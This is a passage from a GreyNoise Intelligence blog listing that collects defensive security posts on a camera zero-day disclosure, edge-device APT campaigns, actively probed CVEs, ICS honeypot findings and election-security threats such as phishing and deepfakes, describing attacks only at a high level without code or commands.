Blog
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI

GreyNoise has discovered previously undisclosed zero-day vulnerabilities in IoT-connected live streaming cameras, leveraging AI to catch an attack before it could escalate. These cameras are reportedly used in sectors such as industrial operations, healthcare, and other sensitive environments like houses of worship, highlighting the urgent need for stronger cybersecurity defenses as the threat landscape continues to evolve.

This discovery was made possible after a GreyNoise honeypot detected an attempt to execute an exploit against it. An attacker had developed and automated a zero-day vulnerability exploit, using a broad-spectrum reconnaissance and targeting strategy to run it across the internet. However, the exploit hit GreyNoise’s global sensor network, where GreyNoise’s proprietary internal AI technology flagged the unusual activity. Upon further investigation, GreyNoise researchers discovered the zero-day vulnerabilities. Once exploited, attackers could potentially seize complete control of the cameras, view and/or manipulate video feeds, disable camera operations, and enlist the devices into a botnet to launch denial-of-service attacks

This marks one of the first instances where threat detection has been augmented by AI to discover zero-day vulnerabilities. By surfacing malicious traffic that traditional tools would have missed, GreyNoise successfully intercepted the attack, identified the vulnerabilities, and reported them before they could be widely exploited. The company’s proactive approach, combining AI-powered detection with expert human analysis, proves that AI can dramatically accelerate the discovery of vulnerabilities — making the internet safer, one discovery at a time. 

GreyNoise partnered with VulnCheck to responsibly disclose the flaws, tracked as CVE-2024-8956 and CVE-2024-8957.   

View the full technical analysis and register now for GreyNoise’s expert panel webinar to learn more about the broader implications of these findings for security professionals. 

Affected Devices and Common Use-Cases

The vulnerabilities impact NDI-enabled pan-tilt-zoom (PTZ) cameras from multiple manufacturers. Affected devices use VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. These cameras, which feature an embedded web server allowing for direct access by web browser, are reportedly deployed in environments where reliability and privacy are crucial, including:

  • Industrial and manufacturing plants for machinery surveillance and quality control.
Industrial Machinery Surveillance. Source: PTZOptics.com
AI-Driven Manufacturing Camera. Source: PTZOptics.com

  • Business conferences for high-definition video streaming and remote presentations. 
Business Streaming Setup. Source: PTZOptics.com

  • Healthcare settings for telehealth consultations and surgical live streams.
Surgical Live Stream. Source: PTZOptics.com
Telehealth Camera in Hospital Room. Source: PTZOptics.com

  • State and local government environments, including courtrooms
Courtroom Surveillance Camera. Source: PTZOptics.com

  • Houses of worship for live streaming of religious services
Religious Service Streaming Camera. Source: PTZOptics.com

Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. 

Vulnerabilities Discovered

CVSS 9.1 (Critical)
Insufficient Authentication: CVE-2024-8956 
  • Inadequate authentication mechanisms could allow an attacker to access sensitive information like usernames, MD5 password hashes, and configuration data. MD5 hashes have long been considered insecure, meaning attackers could potentially crack them and gain administrative access. 
CVSS 7.2 (High)
OS Command Injection: CVE-2024-8957
  • Chained with CVE-2024-8956, an attacker can execute arbitrary OS commands on the affected cameras, potentially allowing an attacker to seize full control of the system. 

Full Camera Takeover, Unauthorized Surveillance, Data Breach, Broader Attacks, and More

GreyNoise found the affected cameras to be vulnerable to a range of potentially dangerous attacks. These vulnerabilities, if exploited, could potentially expose sensitive business meetings, compromise telehealth sessions, and disrupt cameras deployed in industrial settings, leaving organizations potentially exposed to data and privacy breaches.

Full Camera Takeover and Unauthorized Surveillance
  • By exploiting both CVE-2024-8956 and CVE-2024-8957, an attacker could potentially seize full control of the camera, view and/or manipulate the video feeds, and gain unauthorized access to sensitive information. Devices could also be potentially enlisted into a botnet and used for denial-of-service attacks. 

Attacks like this are not new — in 2021, live feeds of 150,000 cameras inside schools, hospitals, and more were exposed. Vulnerable IoT devices are prime targets for attackers looking to add compromised devices to a botnet, like the infamous Mirai botnet. 

Broader Network Attacks and Data Breach
  • An attacker could extract network details, including IP addresses, MAC addresses, and gateway configurations, potentially leveraging this information to pivot and move laterally into the device’s local network. This could potentially compromise other systems on the same network, which could lead to broader data breaches or even the spread of ransomware. 
Disablement of Camera Operations
  • CVE-2024-8956 allows for configuration files to be updated or entirely overwritten. An attacker could exploit this vulnerability to intentionally misconfigure or disable the camera, potentially disrupting camera operations. 

How GreyNoise Discovered These Vulnerabilities Using AI

Security teams today face an overwhelming number of alerts, many of which result from harmless internet activity like routine scans and benign traffic. With countless alerts pouring in daily, identifying threats becomes incredibly difficult, and many serious vulnerabilities can go unnoticed amid the noise. 

This is where AI steps in. GreyNoise’s Sift, powered by large language models (LLMs) trained on vast amounts of internet traffic — including traffic targeting IoT devices — identifies anomalies that traditional systems may miss. Instead of just reacting to known threats, Sift excels at spotting new anomalies, threats that haven't been identified yet or don’t fit any known signatures. 

What Makes Sift Different 

Sift analyzes real-time internet traffic and enriches that data with GreyNoise’s proprietary datasets. It then runs the data through advanced AI systems, which help separate routine activity from potential threats. This process allows researchers to focus on truly meaningful threats without getting lost in the noise. 

In this case, Sift flagged unrecognized traffic that had not been tagged as a known threat. This caught the attention of GreyNoise researchers, who further investigated the unusual traffic. Their investigation led to the discovery of two previously unknown zero-day vulnerabilities in live streaming cameras — highlighting how AI can transform the speed and accuracy of cybersecurity research. 

“This isn’t about the specific software or how many people use it — it’s about how AI helped us catch a zero-day exploit we might have missed otherwise,” said Andrew Morris, Founder and Chief Architect at GreyNoise Intelligence. “We caught it before it could be widely exploited, reported it, and got it patched. The attacker put a lot of effort into developing and automating this exploit, and they hit our sensors. Today it’s a camera, but tomorrow it could be a zero-day in critical enterprise software. This discovery proves that AI is becoming essential for detecting and stopping sophisticated threats at scale.” 

Human Researchers + AI: A Powerful Combination 

By rapidly filtering out irrelevant traffic, Sift gives human researchers a clear head start. Capable of sifting through millions of data points, it enables researchers to focus on critical threats in real-time. This combination of AI-driven anomaly detection and human-led investigation is essential in today’s fast-paced cybersecurity landscape, where attackers are constantly evolving their tactics. Without Sift’s machine learning capabilities, these vulnerabilities might have remained hidden. 

The Broader IoT Challenge: Proliferation and Internet Noise 

GreyNoise’s discoveries shed light on a larger issue facing the rapidly growing IoT landscape. With nearly 19 billion IoT devices in operation globally, industrial and critical infrastructure sectors rely on these devices for operational efficiency and real-time monitoring. However, the sheer volume of data generated makes it challenging for traditional tools to discern genuine threats from routine network traffic, leaving systems vulnerable to sophisticated attacks. Last month, U.S. authorities dismantled a botnet that leveraged a variety of IoT devices, including IP cameras. IoT devices remain a prime target for attackers looking to exploit insecure design and functionality. 

Recommendations to Protect Your Organization

Organizations using VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63 should take immediate action to patch the discovered vulnerabilities and secure their systems

VulnCheck alerted affected manufacturers to the flaws, only receiving a response from PTZOptics. The manufacturer released firmware updates addressing these flaws.

Read the GreyNoise Labs blog for technical analysis and deeper insight into how Sift helped discover these zero-day vulnerabilities.

Don’t Miss the Webinar!

Join our expert panel for an exclusive webinar where we dive deep into the technical details and strategic implications of this discovery to provide the context you need to better protect your organization. 

Register now to reserve your spot today and learn how AI-driven cybersecurity is changing the status quo and how it can transform your security strategy. 

The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices

A newly released report by Sophos reveals a sophisticated multi-year APT (Advanced Persistent Threat) campaign that exploited network perimeter devices, using both new and older vulnerabilities to infiltrate high-value targets. Beginning in 2018, the campaign’s actors leveraged advanced tactics, techniques, and procedures to target internet-facing devices belonging to government and critical infrastructure entities, and other high-value targets. The campaign demonstrates that APT actors are increasingly focusing on network perimeters — especially unpatched, internet-facing devices like VPNs, routers, and other edge infrastructure — as prime entry points for further compromise. 

“This campaign is a wake-up call about just how serious the threat to edge devices really is,” said Andrew Morris, Founder and Chief Architect at GreyNoise Intelligence. “Attackers are getting in through overlooked devices, deploying rootkits at the firmware level, and persisting on everything from routers to security cameras to HVAC systems and digital signage. And here’s the thing: detecting this kind of persistence today is incredibly tough. Major device platform vendors have entire teams dedicated to rooting out these threats on PCs, and it’s still a struggle. So, imagine trying to detect and defend against this level of sophistication on an embedded device like a router or a modem — almost no chance.”

At GreyNoise, we observe perimeter-focused attacker behavior across a range of vulnerabilities, both new and resurgent, providing us with a unique view of these threats as they unfold. This blog unpacks key strategic insights from the campaign, explains why network perimeter exploitation should be a top security focus, and provides actionable steps to help security teams stay one step ahead. We’ll explore some of the actively probed CVEs associated with this campaign, the ongoing risks of unpatched devices, and practical ways to mitigate exposure using real-time intelligence. 

GreyNoise is proud to have contributed to Sophos’ research and we encourage you to read the full report. In an effort to aid in exposure mitigation efforts, GreyNoise is providing the following information to defenders:

  • View exploit activity and actively block exploitation of the CVEs related to Pacific Rim
  • Get 14 days of free access to GreyNoise Vulnerability Prioritization Intelligence to enable active blocking against exploitation of Pacific Rim-related vulnerabilities 

The APT Campaign: A Sophisticated and Stealthy Multi-Year Assault 

The Sophos report details a sophisticated campaign beginning in 2018, where attackers initially targeted Cyberoam, an India-based Sophos subsidiary. Using intelligence gathered from Cyberoam, along with additional development, the attackers attempted mass exploitation to build a network of operational relay boxes (ORBs). However, after largely failing in this due to detection, they shifted tactics to remain under the radar, focusing exclusively on a small number of high-value targets. This more targeted approach enabled them to infiltrate select government agencies, critical infrastructure, and influential organizations such as embassies. This campaign underscores how APTs adapt and leverage both collected intelligence and advanced tradecraft to achieve their strategic goals. 

The attackers exhibited patience and adaptability, evolving their approach from broad, indiscriminate scanning to targeted reconnaissance and exploitation. Their tactics included custom rootkits, firmware-based persistence, and sophisticated command-and-control channels, like ICMP tunneling and proxy chains, enabling long-term, stealthy access to compromised networks. This combination of large-scale scanning followed by focused exploitation demonstrates how attackers systematically identify and prioritize vulnerabilities on perimeter devices to achieve their objectives.  

The Network Perimeter: An Overlooked but Critical Attack Vector

This campaign highlights how perimeter devices — including VPNs, routers, and other internet-facing systems — serve as critical points of entry for attackers. Although these devices are essential to network operations, ensuring timely patching can be challenging due to the business impact of taking these systems offline, making them attractive targets for attackers seeking to exploit this operational challenge. 

GreyNoise’s data consistently shows that perimeter devices draw significant reconnaissance and scanning activity from malicious IPs probing weak points. Our real-time intelligence captures how attackers conduct broad scans across these devices, identifying which ones might be vulnerable to exploitation.

This heatmap highlights the volume of malicious IPs actively targeting high-profile systems leveraging CVEs related to the campaign, illustrating the intensity of reconnaissance and exploitation and offering critical insights for prioritizing defenses around these devices. 

Security professionals should regularly audit and patch all high-profile systems that are internet-facing, especially those with widely known vulnerabilities. Leveraging IP blocklists allows security teams to intercept and block scanning activity on these endpoints, helping to prevent initial access and reduce perimeter risks. 

Resurgent Vulnerabilities: The Persistent Threat of Unpatched CVEs

While newer vulnerabilities often dominate security headlines, this campaign underscores that attackers frequently exploit older vulnerabilities as well. Over 35% of the CVEs in Sophos' Database of Network Device CVEs were released before 2020, with 95% of them included in CISA’s Known Exploited Vulnerabilities (KEV) catalog — a vital resource for tracking high-risk vulnerabilities. Despite available patches, these CVEs often remain unpatched on many perimeter devices, making them easy targets for attackers.

Re-evaluate patching priorities to include older vulnerabilities that impact perimeter devices. GreyNoise’s CVE tracking provides insights into which resurgent vulnerabilities see active targeting, allowing teams to focus on high-risk vulnerabilities that are exploited repeatedly. Older vulnerabilities continue to present significant risk if left unpatched, particularly on perimeter devices.  

The Role of Real-Time Reconnaissance in Understanding Exploitation Trends

According to the Sophos report, the attackers initially began their campaign with broad, indiscriminate scanning to locate vulnerable devices before refining their focus to specific, high-value targets. This phased approach demonstrates how attackers leverage large-scale reconnaissance to identify weak entry points and then shift to targeted exploitation. 

GreyNoise’s real-time data on reconnaissance trends offers visibility into this broader phase, capturing which high-profile CVEs attackers are actively probing across devices. This data reveals where attackers focus their scanning efforts on the network perimeter, providing early indicators of which vulnerabilities are most at risk. 

APTs Are Evolving, and the Network Perimeter Remains a Key Target

The precision and patience of this APT campaign send a clear message: perimeter devices remain prime targets, and unpatched vulnerabilities continue to offer attackers a simple path to network entry. The campaign reinforces the need for security professionals to maintain real-time visibility into these threats — both legacy CVEs and active reconnaissance of network devices. 

By monitoring attacker behavior and focusing on high-risk vulnerabilities, teams can take concrete steps to strengthen their defenses against persistent, sophisticated attacks. 

Supporting Your Exposure Management Efforts

We know that many organizations are working diligently to assess their exposure, analyze logs, and manage vulnerabilities following this APT campaign. To aid in this effort, GreyNoise is providing all users — both paying and free — 14 days of access to real-time exploitation data for the CVEs associated with this threat. Our goal is to help security teams stay informed and make it easier to track active exploitation. 

Access the Data:

  • View exploit activity and actively block exploitation of the CVEs related to Pacific Rim
  • Get 14 days of free access to GreyNoise Vulnerability Prioritization Intelligence to enable active blocking against exploitation of Pacific Rim-related vulnerabilities 
  • Read the documentation detailing how this feature works and how it can help you. 

----

Noah Stone contributed to this writeup in collaboration with GreyNoise Research. Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations. 

U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now

A joint U.S. and UK advisory has identified 25 vulnerabilities tied to an exploitation campaign by Russia state-sponsored threat actors, specifically APT 29 — the group behind the infamous SolarWinds hack. GreyNoise actively tracks 12 of the 25 vulnerabilities mentioned in the advisory. To provide real-time, actionable context, GreyNoise has detected that nine of these vulnerabilities are being actively probed by attackers, offering critical insights for organizations to prioritize their defenses. 

Executive Summary 

  • The U.S. and UK governments issued a joint advisory warning of Russian state-sponsored cyber threats, specifically from APT 29, the group responsible for the SolarWinds hack.  
  • The advisory identifies 25 CVEs across major platforms (Cisco, Citrix, Microsoft, etc.) that are being opportunistically scanned by attackers. 
  • Tracking 12 of the 25 CVEs in the advisory, GreyNoise’s real-time intelligence shows nine of these vulnerabilities are currently experiencing active probing.
  • The advisory urges organizations to patch vulnerabilities to mitigate the threat and prevent potential exploitation

Given the real-time nature of GreyNoise’s observations, the set of actively targeted vulnerabilities is likely to change over time. Please check the GreyNoise Visualizer for the latest information. 

What GreyNoise Is Seeing

GreyNoise observes internet traffic via its global network of sensors and honeypots, allowing it to track and classify behavior as malicious or benign. 

While the advisory outlines 25 vulnerabilities, GreyNoise is uniquely positioned to provide real-time insights, identifying the nine CVEs currently being probed. These active scans are part of mass, opportunistic efforts, a tactic commonly used by threats actors like APT 29 (Cozy Bear), although GreyNoise does not attribute malicious activity directly. 

12 GreyNoise-Tracked CVEs in the Advisory — Nine Actively Probed Right Now 

Of the 12 GreyNoise-tracked CVEs mentioned in the joint advisory, GreyNoise observes exploitation or reconnaissance activity across the following: 

  1. CVE-2023-20198 — Cisco IOS XE Web UI Privilege Escalation 
  2. CVE-2023-4966 — Citrix NetScaler ADC Buffer Overflow
  3. CVE-2021-27850 — Apache Tapestry Deserialization of Untrusted Data
  4. CVE-2021-41773 — Apache HTTP Server Path Traversal
  5. CVE-2021-42013 — Apache HTTP Server Path Traversal
  6. CVE-2018-13379 — Fortinet FortiOS SSL VPN Path Traversal 
  7. CVE-2023-42793 — JetBrains TeamCity Authentication Bypass
  8. CVE-2023-29357 — Microsoft SharePoint Server Privilege Escalation
  9. CVE-2023-35078 — Ivanti Endpoint Manager Mobile Authentication Bypass

These vulnerabilities cover a wide range of products critical to business operations and infrastructure, making this real-time data invaluable for defenders to prioritize patching. 

Mass Opportunistic Scanning in the Spotlight

In the joint advisory, the agencies highlighted the threat of mass opportunistic scans and the focus thereof by Russian intelligence: 

“This mass scanning and opportunistic exploitation of vulnerable systems, as opposed to more targeted operations, increase the threat surface to include virtually any organization with vulnerable systems. 

The SVR [Russian Foreign Intelligence] takes advantage of opportunistic victims to host malicious infrastructure, conduct follow-on operations from compromised accounts, or to attempt to pivot to other networks.”

The advisory comes at a time when attackers are increasingly relying on mass opportunistic scanning to compromise organizations, making it critical that organizations leverage real-time intelligence showing when and where attackers are engaged in reconnaissance and exploitation activity

Recommendations to Protect your Organization

  1. Patch Immediately: Ensure the nine vulnerabilities identified by GreyNoise as being actively probed are patched as soon as possible.
  2. Monitor Real-Time Activity: Stay vigilant by leveraging real-time intelligence, which can help organizations track shifts in attacker activity. 
  3. Strengthen Defenses: Take steps to harden security controls, such as deploying firewall blocklists and reinforcing access control policies, to mitigate the risk of successful exploitation.

For more details, read the full U.S. and UK report here

Protecting Democracy From The Growing Threat of Deepfakes and Disinformation

(This is the conclusion of our four-part series on "Understanding the Election Cybersecurity Landscape".)

Thanks to the emergence of powerful new AI-infused tools, a new battleground for democracy has emerged — one that does not rely on physical conflict but on the manipulation of information. Deepfakes and disinformation campaigns have become potent weapons, threatening the integrity of democratic processes. These sophisticated techniques not only mislead the public but also sow discord, making it increasingly difficult to distinguish truth from falsehood.

The Rise of Deepfakes and Disinformation

Deepfakes — a.k.a., hyper-realistic, artificially generated or manipulated videos or audio recordings — have advanced to a level where even seasoned experts struggle to differentiate them from authentic media. Combined with disinformation campaigns, these tools can spread false narratives at alarming speed and scale.

The January 2024 New Hampshire primary was a wake-up call. Voters received robocalls featuring an AI-generated voice impersonating President Joe Biden, urging them to abstain from voting in the primary. Instead, the message encouraged them to save their vote for the general election. This incident is a single, yet stark, example of how domestic actors are utilizing advanced technologies to manipulate voters and disrupt electoral processes.

How Disinformation Campaigns Work

Disinformation campaigns thrive in online platforms, from social media to fake news websites. Both domestic and foreign actors — including Russia, China, and Iran — are involved in these efforts, as highlighted by the Intelligence Community's 2024 Annual Threat Assessment. Their goal is simple but destructive: to exacerbate societal divisions and influence voter perceptions.

In a recent case, the Department of Justice foiled a Russian-sponsored operation that aimed to sway voters by creating fake news sites that closely mimicked legitimate media outlets. Such tactics demonstrate the lengths to which bad actors will go to infiltrate and corrupt the information ecosystem.

The Damage to Democracy

Disinformation and deepfake technologies threaten to destabilize democratic institutions in several ways:

  • Erosion of Trust: When voters are repeatedly exposed to manipulated content, they begin to question the credibility of even legitimate sources of information, undermining the trust necessary for a healthy democracy.
  • Increased Polarization: By amplifying controversial issues and stoking social discord, disinformation campaigns deepen divisions within society. This polarization makes it harder for communities to come together on critical issues, further fragmenting the electorate.

Senator Warner’s Call to Action

In response to these escalating threats, Senator Mark R. Warner has called for decisive action. In a letter to the Cybersecurity and Infrastructure Security Agency (CISA), Warner outlined the critical need for state and local election officials to be equipped with the tools to counter disinformation and deepfakes. These officials are often voters' most trusted sources of election information, but they operate with limited resources and staff.

Warner urged CISA to strengthen its support for local election administrators and advocated for collaboration across government agencies, technology companies, academic institutions, and international allies to combat the spread of disinformation. Only through coordinated efforts can we build the resilience necessary to defend democratic processes.

What Can Be Done?

As technology continues to evolve, so too does the potential for its misuse. Deepfakes and disinformation campaigns are not just technological novelties; they are deliberate attempts to distort reality and undermine the public’s trust in elections. To safeguard democracy, proactive measures must be taken:

  • Awareness: The first line of defense is public awareness. Voters need to be alert to the reality that not everything they encounter — especially online — is trustworthy.
  • Media Literacy: Education is essential. By equipping people with the skills to critically evaluate the information they consume, we can reduce the impact of false narratives. Schools, community organizations, and media outlets all have a role to play in promoting media literacy.
  • Collaboration: A united front is essential to combat these sophisticated threats. Government agencies like CISA must work hand-in-hand with state and local election officials, private technology firms, and global allies to share intelligence, develop strategies, and respond swiftly to emerging threats.

Conclusion: Defending Democracy in the Digital Era

The threat posed by deepfakes and disinformation campaigns is real and growing. As technology advances, so does the potential for misuse by those seeking to disrupt democratic processes. By raising awareness, promoting media literacy, and fostering collaboration between government, private sectors, and international allies, we can protect the integrity of our elections and ensure that democracy endures in the digital age.

Now is the time to act. The future of democracy depends on our collective ability to respond to these new challenges. Let's safeguard the truth and uphold the trust that is the foundation of democratic society.

What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)?

GreyNoise’s honeypots have been actively monitoring exploit attempts targeting the SolarWinds Serv-U vulnerability (CVE-2024-28995), revealing exactly what files attackers are after. From key system files to credential-containing configuration files, our data shows how attackers are scanning for vulnerable systems in real time.

GreyNoise interacts directly with attackers through its honeypots, providing verifiable, firsthand data. This gives security teams a clearer, more accurate picture of real-time threats, allowing them to cut through the noise and focus on what's truly malicious.

Read the full blog now!

Phishing and Social Engineering: The Human Factor in Election Security

(This is part three in our "Understanding the Election Cybersecurity Landscape" series.)

As we rapidly approach the 2024 U.S. elections, the human element remains one of the most vulnerable aspects of our electoral system. While technological defenses continue to evolve, state actors and cybercriminals in general are increasingly turning to phishing and social engineering tactics to exploit human psychology and gain unauthorized access to sensitive information or systems. These attacks pose a significant threat to election integrity by targeting election officials, campaign staff, and voters alike.

The Anatomy of Election-Related Phishing Attacks

Phishing attacks during election seasons often exploit the heightened emotions and time pressures associated with political campaigns. Attackers craft convincing emails, text messages, or social media posts that appear to come from trusted sources such as election boards, political parties, or candidates themselves. These messages typically create a sense of urgency or importance to prompt quick, unthinking responses from targets.

For example, an election official might receive an email that appears to be from a voting machine vendor, claiming there's a critical security update that needs immediate attention. The email could contain a malicious link or attachment that, when clicked, installs malware or captures login credentials. Similarly, voters might receive text messages with false information about polling place changes or registration requirements, containing links to fraudulent websites designed to steal personal information.

Social Engineering: Exploiting Trust and Authority

Social engineering attacks go beyond simple phishing by leveraging more complex psychological manipulation. These attacks often involve multiple touchpoints and can unfold over extended periods, making them particularly insidious.

In the context of elections, a social engineering attack might involve an attacker posing as an IT support technician, contacting county election workers with offers of assistance. Over time, the attacker builds trust and may eventually request remote access to systems or sensitive information under the guise of providing support. This type of attack exploits the often-overworked and under-resourced nature of many local election offices.

Another common tactic is impersonating authority figures. An attacker might pose as a high-ranking election official or party leader, using this perceived authority to pressure lower-level staff into bypassing security protocols or divulging confidential information.

The Cascading Impact on Election Security

The consequences of successful phishing and social engineering attacks can be far-reaching. A single compromised account or system can serve as an entry point for broader network infiltration, potentially leading to:

  • Disruption of election management systems, including those that are responsible for updating public-facing results on and after election day
  • Theft or manipulation of voter registration data
  • Unauthorized access to voting machine software or configurations
  • Leaks of sensitive campaign strategies or communications
  • Spread of disinformation from trusted sources

Moreover, even unsuccessful attacks can erode public confidence in the electoral process. The mere perception that election systems or officials might be compromised can fuel doubts about election integrity, which could be especially problematic this year.

Defending Against the Human Factor

Mitigating the risks posed by phishing and social engineering requires a multi-faceted approach that combines technological solutions with robust human training and awareness programs.

Technical Safeguards

  • Implement strong email filtering and anti-phishing tools
  • Use multi-factor authentication for all critical systems
  • Regularly update and patch software to address known vulnerabilities
  • Employ network segmentation to limit the potential spread of breaches

Human-Focused Defenses

  • Conduct regular, scenario-based training for election officials and staff
  • Develop clear communication protocols for sharing sensitive information
  • Establish verification procedures for requests involving system access or data transfers
  • Create a culture of security awareness where staff feel empowered to question suspicious or urgent requests

Public Education

  • Launch voter education campaigns on recognizing election-related phishing attempts
  • Provide clear, authoritative sources for election information
  • Encourage critical thinking and verification of election-related messages
  • Ensure there is a clear way for voters to recognize legitimate municipal communications, and provide straightforward ways for them to validate potentially illegitimate ones

The Road Ahead

As we move ever closer to the 2024 elections, the sophistication of phishing and social engineering attacks is likely to increase. The rise of AI-generated content, including deepfakes, will make it even more challenging to distinguish legitimate communications from fraudulent ones (something we will cover in the final installment).

However, by focusing on the human element – both in terms of vulnerabilities and strengths – we can build a more resilient election security ecosystem. Empowering election officials and voters with knowledge and critical thinking skills is our best defense against these evolving threats.

The integrity of our elections depends not just on secure technology, but on a vigilant and informed populace. By recognizing the central role of human factors in election security, we can work towards elections that are not only technologically sound but also trusted and resilient in the face of increasingly sophisticated attacks.

Challenging Assumptions: Enhancing the Understanding of Securing Internet-Exposed Industrial Control Systems

Censys and GreyNoise teamed up for the last three months to shed new light on the real-world threats facing internet-exposed industrial control systems (ICS). At LABSCon 2024, they shared their findings, challenging some long-held assumptions about ICS security.

Earlier this year, Censys researchers identified over 40,000 internet-connected ICS devices in the U.S., including over 400 human-machine interfaces (HMIs). Many of these interfaces required no authentication at the time of observation. HMIs provide easy-to-understand and easy-to-manipulate interfaces, which make them low-hanging targets for threat actors seeking to disrupt operations. Given the relative ease of manipulation, we were curious about the actual attack traffic such interfaces receive.

To conduct preliminary research, GreyNoise set up hyper-realistic emulations of internet-connected HMIs for critical control systems, camouflaging them by geography and ASNs. Glenn Thorpe, Sr. Director, Security Research & Detection Engineering at GreyNoise analyzed forty-five days of data for these surprising and concerning findings:  

  1. Rapid Targeting: Internet-connected HMIs were probed and scanned more quickly than baseline control sensors. Over 30% of IPs that touched the HMIs before a typical GreyNoise sensor were later identified as malicious.
  1. Focus on Remote Access: Contrary to expectations, attackers primarily targeted common Remote Access Service (RAS) protocols rather than ICS-specific communication protocols. Virtual Network Computing (VNC) was of particular interest to threat actors.

Implications for ICS Security

This research highlights a potential disconnect between perceived risks and actual threat actor behavior toward internet-exposed ICS. While the industry has long focused on securing ICS-specific communication protocols, the more pressing threat may lie in more common, easily exploitable entry points like remote access services. The swift targeting suggests a prioritization for probing such devices online.

This research underscores the critical importance of securing remote access services as a frontline defense for ICS environments. The relative ease of targeting these generic entry points may often render the exploitation of specialized ICS protocols unnecessary.

GreyNoise and Censys intend to continue this research to learn more based on these experimental findings.

The Role of State-Sponsored Actors in Election Interference

(This is part two in our "Understanding the Election Cybersecurity Landscape" series.)

State-sponsored actors play a critical role in election interference, employing a range of tactics to undermine the integrity of the electoral process. These actors, often backed by powerful nations like Russia, China, and Iran, have the resources and motivation to conduct sophisticated attacks that can erode public trust in elections.

Tactics and Techniques

State-sponsored actors engage in various activities interfering with elections, including cyberespionage, disinformation campaigns, and direct attacks on election infrastructure. Cyberespionage involves the theft of sensitive information, such as voter data or campaign communications, which can be used to influence public opinion or blackmail candidates. Disinformation campaigns, often conducted through social media, aim to spread false or misleading information to manipulate voter perceptions and sow discord. For example, Russia has been known to use fake personas and highly networked accounts to spread hyper-partisan themes effectively and quickly.

Direct attacks on election infrastructure are also a concern, as they can disrupt the voting process and undermine the integrity of election results. This includes attempts to gain physical or digital access to election systems, which can compromise their confidentiality, availability, or integrity. For instance, the Justice Department recently indicted two Russian propagandists associated with the state-funded media outlet RT for allegedly engaging in money laundering and channeling nearly $10 million to a right-leaning media organization.

We've also seen evidence of a recent suspected Iranian attack against the campaign of Republican presidential nominee Donald Trump, potentially resulting in the theft of internal campaign documents. The FBI is investigating the matter, as well as attempts to infiltrate President Joe Biden's reelection campaign, which became Vice President Kamala Harris' campaign after Biden dropped out of the race.

Impact and Implications

The activities of state-sponsored actors in election interference have significant implications for democratic societies. By undermining public trust in the electoral process, these actors can erode the legitimacy of governments and create social divisions. For example, research suggests that election interference campaigns can intensify internal divisions within a target state, making it harder for the political establishment to agree on priorities, implement policy, and respond to challenges from foreign actors.

Countermeasures

To counter the threats posed by state-sponsored actors, it is essential to understand their methods and recognize the signs of such interference. This includes investing in cybersecurity efforts for political campaigns, encouraging social media companies to remove deceptive or hateful posts, and passing legislation requiring online political ads to adhere to certain standards of truthfulness. Additionally, election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans.

What Can You Do?

Understanding the methods of state-sponsored actors and recognizing the signs of such interference is crucial in developing robust defenses. By investing in cybersecurity, promoting transparency in political advertising, and enhancing election infrastructure security, we can mitigate the risks posed by these actors and protect the integrity of democratic elections.

We've put together the following list of resources to help folks further understand and defend against this very real and present threat:

  • Election Cybersecurity Landscape: The global election cybersecurity landscape is characterized by diverse targets, tactics, and threats, with state-sponsored actors posing the most serious cybersecurity risk to elections.
  • Hybrid Warfare: Election interference is often a key tactic of hybrid warfare campaigns, which seek to exacerbate internal divisions within a target state through tactics such as disinformation and cyberattacks.
  • Election Security Measures: Election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans to protect against cyber, physical, and operational security risks.
  • Countering Foreign Interference: Countering foreign interference in U.S. elections requires understanding how adversaries exploit fault lines within society and using strategies such as collecting open-source intelligence on social media and releasing public service announcements to warn about strategic threats.

Recent Influence Operations: Recent foreign influence operations have been identified, including those perpetrated by Russia, China, and Iran, which have been accused of conducting complex campaigns to manipulate U.S. politics.

BLUUID: Firewallas, Diabetics, And… Bluetooth

We're excited to share a groundbreaking new blog post from our Labs team that dives deep into the world of Bluetooth Low Energy (BTLE) device identification and vulnerability research. In "BLUUID: Firewallas, Diabetics, And... Bluetooth," our very own Remy explores the fascinating and often overlooked realm of BTLE security.

This comprehensive analysis covers everything from building a BTLE Generic Attribute (GATT) Universally Unique Identifiers (UUIDs) database to remotely identifying Bluetooth devices for vulnerability research. Remy doesn't just stop at theory – he demonstrates real-world implications by uncovering and responsibly disclosing vulnerabilities in Firewalla firewall products.

But why should you care about BTLE security? As Remy points out, the impact extends far beyond just privacy concerns. Recent incidents involving BTLE-enabled insulin pumps highlight the potential for physical harm when these systems are compromised or malfunction.

In this blog, you'll learn:

  • How to build a database of BTLE UUIDs for remote device identification
  • Techniques for extracting identifying attributes from Android APKs
  • Real-world application of these methods in vulnerability research
  • Insights into the current state of BTLE security in healthcare devices

Whether you're a cybersecurity professional, IoT enthusiast, or simply curious about the hidden world of Bluetooth, this blog post offers valuable insights and practical techniques you won't want to miss.

Ready to dive in? Head over to the GreyNoise Labs blog to read the full article and expand your understanding of BTLE security and its far-reaching implications.

Unveiling Vulnerability Insights from the CISA KEV Catalog at BSidesLV

Last week at BSidesLV, I had the privilege to explore the complexities of the CISA's Known Exploited Vulnerabilities (KEV) Catalog. This vital resource aids organizations in understanding which vulnerabilities are actively exploited and how to prioritize remediation efforts effectively. 

Here, I’ll share three key insights from my analysis that can enhance vulnerability management strategies.

The full talk (it's only 20 minutes, but I clearly could have used 30!) can be found here, and the slides and dataset used can be found here.

The Decreasing Age of CVEs Added to KEV

